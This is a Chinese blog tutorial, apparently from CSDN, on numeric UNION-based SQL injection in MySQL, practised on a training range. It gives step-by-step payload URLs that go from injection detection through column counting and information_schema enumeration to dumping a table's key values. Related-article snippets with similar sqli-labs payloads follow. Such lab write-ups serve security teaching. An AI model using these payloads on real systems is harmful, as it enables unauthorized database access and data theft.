MySQL联合注入之数字型注入

最新推荐文章于 2023-05-02 22:19:21 发布
最新推荐文章于 2023-05-02 22:19:21 发布
阅读量630 收藏 3
点赞数 2
分类专栏: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_50211409/article/details/115248979
版权

sql

SQL注入原理
SQL注入攻击是网站未对sql语句,完全校验通过将恶意的SQL查询或添加语句插入到应用的输入参数中,再在后台SQL服务器上解析执行进行的攻击。一切与数据库存在交互的地方都是有可能存在注入漏洞的。
这难度程度是比较简单的,但是需要一些SQL语句基础。
测试环境:东塔靶场
https://labs.do-ta.com/index/course/detail/id/51
测试工具:hackebay
1.判断是否存在注入
我们可以在url的id=1后添加一个单引号(‘)执行,看语句是否会带入查询
如果语句带入查询的话,单引号都是成对出现的而这里只有一个,那么语句肯定是不成立的从而报错,来判断是否存在注入,页面返回错误则说明存在注入。
http://120.25.24.45:32333/index.php?id=1
在这里插入图片描述也可以使用and逻辑运算符来判断,and 1=1 ,1=1肯定为真,则页面返回正常
1=2为假,1永远不可能等于2为假,则页面返回错误
在这里插入图片描述在这里插入图片描述2.使用order by 查询字段数 ,这里查询到字段为8!
120.25.24.45:32333/index.php?id=1 order by 8
在这里插入图片描述3.判断会显点 使用union select 联合查询,跟据上面我们查询到的字段数进行查询,查询的时候在=1前面家一个-号让前面的语句报错,执行后面的语句从而查询到回显点。
120.25.24.45:32333/index.php?id=-1 union select 1,2,3,4,5,6,7,8

在这里插入图片描述4.查询当前用户名与数据库及数据库版本
user() 查询用户名
http://120.25.24.45:32024/index.php?id=-1%20union%20select%201,user(),3,4,5,6,7,8
database()查询当前数据库
http://120.25.24.45:32024/index.php?id=-1 union select 1,database(),3,4,5,6,7,8
version() 查询数据库版本
http://120.25.24.45:32024/index.php?id=-1 union select 1,version(),3,4,5,6,7,8
在这里插入图片描述5.查询表名
http://120.25.24.45:32024/index.php?id=-1 union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema = ‘dotaxueyuan’ ),4,5,6,7,8
表名为:key,users
在这里插入图片描述6.查询列名
http://120.25.24.45:32024/index.php?id=-1%20union%20select%201,database(),(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema%20=%20%27dotaxueyuan%27%20and%20table_name%20=%20%27key%27),4,5,6,7,8
列名为:ID,key
在这里插入图片描述7.爆数据
http://120.25.24.45:32502/index.php?id=-1 union select 1,database(),(select group_concat(key)from dotaxueyuan.key),4,5,6,7,8
在这里插入图片描述语句可以看见爆出key值了,不用关注URL的对错主要看Payloads
注:千万不要对别人的网站进行测试。如若使用别人的网站做测试,造成的一切后果自负

s7eyd7
关注
专栏目录
【漏洞扫描】——16、Nessus主机安全扫描
Fly_鹏程万里
03-01 2354
Nessus号称是世界上最流行的漏洞扫描程序,全世界有超过75000个组织在使用它。该工具提供完整的电脑漏洞扫描服务,并随时更新其漏洞数据库。Nessus不同于传统的漏洞扫描软件,Nessus可同时在本机或远端上遥控,进行系统的漏洞分析扫描。对应渗透测试人员来说,Nessus是必不可少的工具之一。
【漏洞挖掘】——96、数字型注入深入刨析(上)
最新发布
Fly_鹏程万里
06-20 146
MySQL数字型注入(Numeric Injection)是一种针对数据库查询的安全漏洞攻击,利用了对数字类型的输入验证不足或不正确处理的情况,攻击者利用这个漏洞注入恶意的数字值以绕过应用程序的输入验证并执行未经授权的查询操作或获取敏感数据,而我们所谓的数字型注入其实是指可控参数为整型整型(例如:年龄、id序列号、页码等)且存在注入漏洞,由于参数是整型,所有该类型的注入漏洞被称之为"数字型"注入
mysql 数字注入_Mysql数字型手工注入
weixin_39584549的博客
01-19 191
本文纯粹整理以前的旧笔记整理出来的文章,将简单粗暴的记录Mysql常用各类型注入漏洞的利用和验证方法。01数字型注入_注入点确定一个常见的查询功能页面测试 查看PHP源码的核心代码????解释:红色箭头的id就是post请求包里面取参参数黄色部分就是传入数据库的查询语句 明显传入参数完全没有做过滤当加入一个特殊字符进行查询的时候,Mysql查询语句会变成这样selectusername,emailf...
MySQL数字型注入
fdhdgsdfdsa的博客
03-05 200
准备知识 sql的增删改查命令(其中and & or(运算符)、order by(排序)、union(合并语句操作符)是重点) 判断是否存在漏洞 用and 1=1和and 1=2来验证判断,如: http://www.xxx.com/sqli/01.php?id=1 and 1=1 返回数据,说明执行成功 http://www.xxx.com/sqli/01.php?id=1 and 1=2 不返回数据,说明数据库后台报错了 用排序间接查找出所有列(专业说法SQL中叫字段) 用order b
mysql 数字注入_SQL数字型注入(mysql数据库)
weixin_33196555的博客
01-19 577
好像并没有什么特别的东西。用工具进行全站扫描,查看是否有其他页面存在。结果我们一共扫出了三个页面,一个静态页面,两个动态页面。排除静态页面,login.php是我们刚刚看见的后台登陆页面,我们打开这个new_list.php看看。结果我们可以发现,一片空白,也就是说我们在向服务器请求获取页面的时候,页面没有获取成功,也就是差参数。盲猜试试id=1,这个时候发现页面正常显示了。猜测该注入数字型的注...
SQL 注入-基于联合查询的字符型GET注入
xdjxi的博客
02-16 675
实验原理 字符型GET注入,其注入点存在于URL中的GET参数处; 攻击者可以通过构造恶意的GET输入参数,利用union select 命令进行注入,暴露数据库中存储的信息。 实验步骤 1 访问SQLI-Labs网站 http://(加靶机IP)/sqli-labs/Less-1/ 登录后,根据网页提示,定一个GET参数 http://(靶机ip)/sqli - labs / Less/?id=1 2 寻找注入点 用以下三条payload寻找注入点及判断注入点的类型; http:/
sql注入数字型注入
08-02
SQL 注入数字型注入 SQL 注入数字型注入是一种常见的 Web 应用安全漏洞,攻击者可以通过构造恶意输入来inject恶意 SQL 语句,访问或修改数据库中的敏感信息。本文将详细介绍数字型注入的概念、原理、检测方法和...
mysql post手工注入_pikachu-数字型注入(post)#手工注入
weixin_39842237的博客
02-07 718
1,因为是post型,所以需要抓取数据包2,测试结果为数字型注入提交恒等的语句可以查询到所有的数据信息3,使用UNION联合查询法判断字段数,测试为2个字段时没有报错,所以可以判断字段数为24,爆字段 #发现两个都可以查询5,查询数据库 #可以查到数据库名称为 pikachu6,查数据库pikachu下的表 #可以查到库pikachu下面有5个表(httpinfo,member,message,u...
我的白帽之路-SQL注入数字型注入sqli-labs Less-2】
Offsett的博客
02-27 391
我的白帽之路
理论篇8:SQL注入(字符型注入数字型注入)
aiojay的博客
05-02 3722
SQL注入(字符型注入数字型注入),Mysql中 int(3) 类型的含义,判断MYSQL注入闭合方式:
mysql 数值型注入_Mysql基本注入
weixin_28995139的博客
01-18 219
实验环境:墨者学院Mysql手工注入漏洞测试靶场后台源码没有进行任何字符过滤。首先进入靶场环境先用admin登陆试试果然不行,这时看到用户登录下方有一个停机维护通知,点进去瞅瞅看到这里链接上有id = 1,怀疑这里会有注入点。判断注入点先简单判断是不是字符型注入点,使用单引号闭合语句,注释后面的语句?id = 1'--+发现页面有异常,可能不是字符型,再试试数字型注入?id = 1 and 1 =...
sql-labs数字型、字符型注入
m0_63510587的博客
02-16 3782
访问SQLi-Labs网站 一、数字型注入 1、访问less-2 访问后根据提示先给定一个GET参数 http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 此时页面显示id=1的用户名和密码 2、寻找注入点、判断注入类型 http://127.0.0.1/bc/sqli-labs/Less-2/?id=1’ >> 运行后报错 http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=1 >>
SQL注入-基于联合查询的数字型GET注入
weixin_46831054的博客
02-16 3670
实验原理 数字型GET注入,其注入点存在于URL中的参数处。 攻击者可以通过构造恶意的get输入参数,利用union select命令进行注入,暴露数据库中存储的信息。 实验一 步骤: 1.访问靶机网站:http://127.0.0.1:456/Less-2/ 登录后,根据网页,给出GET参数 ?id=1 显示出用户名:Dumb,密码:Dumb 注:该实验利用Firefox的插件:Hackbar。没有该插件可到搜索框里输入payload参数。 2.寻找注入点 http://127.0.0.1:456/L
SQL注入原理-数值型注入
T1ngSh0w的博客
09-12 1611
SQL注入原理-数值型注入
***学习笔记--基础篇--sql注入数字型
weixin_34364071的博客
09-28 618
环境:dvwa 1.7数据库:mysql dvwa的安全等级:medium一、分析和查找注入点(1)知识点回顾如果上一篇有好好读过的同学应该知道,我们上一篇遇到的字符型注入。也即是通过Get或者Post方式传进去的数据被单引号或者双引号包裹住。如果我们想要注入自己的payload(有效载荷)的话,则我们必须先闭合前面的单引号或者双引号,否则我们的数据始终会被...
渗透学习笔记--基础篇--sql注入数字型
weixin_34239169的博客
02-19 388
环境:dvwa 1.7数据库:mysql dvwa的安全等级:medium 一、分析和查找注入点 (1)知识点回顾 如果上一篇有好好读过的同学应该知道,我们上一篇遇到的字符型注入。也即是通过Get或者Post方式传进去的数据被单引号或者双引号包裹住。如果我们想要注入自己的p...
sql注入--数字型
pakho_C的博客
01-01 2228
sql注入数字型 靶场:sqli-labs-master 下载链接:靶场下载链接 第二关php源码 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connectio
数字型GET注入
supermeatboy223的博客
02-16 1169
1.访问sqli-labs 选择关卡2 登录后根据页面提示 先给定一个GET参数。 在url后加上 ?id=1 此时页面显示 id=1 的用户名 Dump 密码 Dump 2.寻找注入点 分别使用一下三条payload http://192.168.5.152/sql/Less-2/?id=1' http://192.168.5.152/sql/Less-2/?id=1 and 1=1 http://192.168.5.152/sql/Less-2/?id=1 and 1=2 分别
SQL注入基础--数字型注入
qq_42988351的博客
04-02 8242
参考 参考学习链接 学习笔记–基础篇–sql注入数字型SQL注入简述 SQL注入,就是利用现有Web应用程序,构建特殊的参数输入,将(恶意的)SQL语句注入到后台数据库引擎,最终达到欺骗服务器执行恶意SQL语句的目的。 SQL注入的本质是后台SQL语句使用了拼接查询,未对用户输入的数据作安全处理。 SQL注入分类 根据注入形式的不同,可分为: 数字型注 字符型注 搜索型注入 根据请求方式的不同,可分为: GET型注 POST型注 HEADER型注入 根据注入点位置的不同,可分为: 列
SQL注入数字型注入详解与实战
"SQL注入数字型注入" SQL注入是一种常见的网络安全漏洞,主要发生在Web应用程序中。当用户输入的数据未经适当过滤或验证就被直接用于构造SQL查询时,攻击者可以通过精心构造的输入,改变原本的查询逻辑,从而获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值